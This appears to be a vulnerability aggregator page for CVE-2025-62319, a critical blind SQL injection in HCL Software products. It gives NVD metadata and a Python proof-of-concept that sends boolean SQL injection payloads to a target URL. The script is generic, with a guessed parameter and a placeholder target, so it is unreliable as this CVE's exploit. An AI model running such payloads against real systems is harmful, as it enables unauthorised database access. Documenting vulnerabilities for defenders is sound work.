Security Vulnerability Report
CVE-2025-62319 CVSS 9.8 CRITICAL

CVE-2025-62319

Published: 2026-03-16 16:16:13
Last Modified: 2026-03-17 14:20:02

Description

Boolean-Based SQL Injection is a type of blind SQL injection where an attacker manipulates SQL queries by injecting Boolean conditions (TRUE or FALSE) into application input fields. Instead of returning database errors or visible data, the application responds differently depending on whether the injected condition evaluates to true or false. This allows an attacker to inject arbitrary SQL into backend configuration queries executed within the application.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HCL Software (specific affected versions pending official confirmation)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-62319 Boolean-Based SQL Injection PoC
# Target: HCL Product
# Author: Security Researcher


def test_vulnerability(url):
    """
    Test for Boolean-Based SQL Injection vulnerability
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Normal request baseline
    normal_payload = {'id': '1'}
    normal_resp = requests.post(url, data=normal_payload, headers=headers, timeout=10)

    # True condition payload
    true_payload = {'id': "1' AND 1=1 --"}
    true_resp = requests.post(url, data=true_payload, headers=headers, timeout=10)

    # False condition payload
    false_payload = {'id': "1' AND 1=2 --"}
    false_resp = requests.post(url, data=false_payload, headers=headers, timeout=10)

    # Check if vulnerability exists
    if true_resp.text == normal_resp.text and false_resp.text != normal_resp.text:
        print('[+] VULNERABLE: Boolean-based SQL injection confirmed!')
        print('[+] True condition matches normal response')
        print('[+] False condition returns different response')
        return True
    else:
        print('[-] NOT VULNERABLE or target not accessible')
        return False


def extract_data(url, sql_payload):
    """
    Extract data using boolean-based blind injection
    Example: Extract database version
    """
    headers = {'User-Agent': 'Mozilla/5.0'}
    # Example payload for extracting data
    # Adjust based on actual target
    data = {'id': sql_payload}
    response = requests.post(url, data=data, headers=headers, timeout=10)
    return response


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-62319.py <target_url>')
        print('Example: python cve-2025-62319.py http://target.com/endpoint')
        sys.exit(1)
    target_url = sys.argv[1]
    print(f'[*] Testing CVE-2025-62319 on {target_url}')
    test_vulnerability(target_url)
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410 (HCL Software knowledge base article listed in the NVD record)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-62319",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T16:16:13.167",
    "lastModified": "2026-03-17T14:20:01.670",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Boolean-Based SQL Injection is a type of blind SQL injection where an attacker manipulates SQL queries by injecting Boolean conditions (TRUE or FALSE) into application input fields. Instead of returning database errors or visible data, the application responds differently depending on whether the injected condition evaluates to true or false. This allows an attacker to inject arbitrary SQL into backend configuration queries executed within the application."
      },
      {
        "lang": "es",
        "value": "La Inyección SQL Basada en Booleanos es un tipo de inyección SQL ciega donde un atacante manipula consultas SQL inyectando condiciones booleanas (VERDADERO o FALSO) en campos de entrada de la aplicación. En lugar de devolver errores de la base de datos o datos visibles, la aplicación responde de manera diferente dependiendo de si la condición inyectada se evalúa como verdadera o falsa. Esto permite a un atacante inyectar SQL arbitrario en consultas de configuración de backend ejecutadas dentro de la aplicación."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410",
        "source": "[email protected]"
      }
    ]
  }
}
```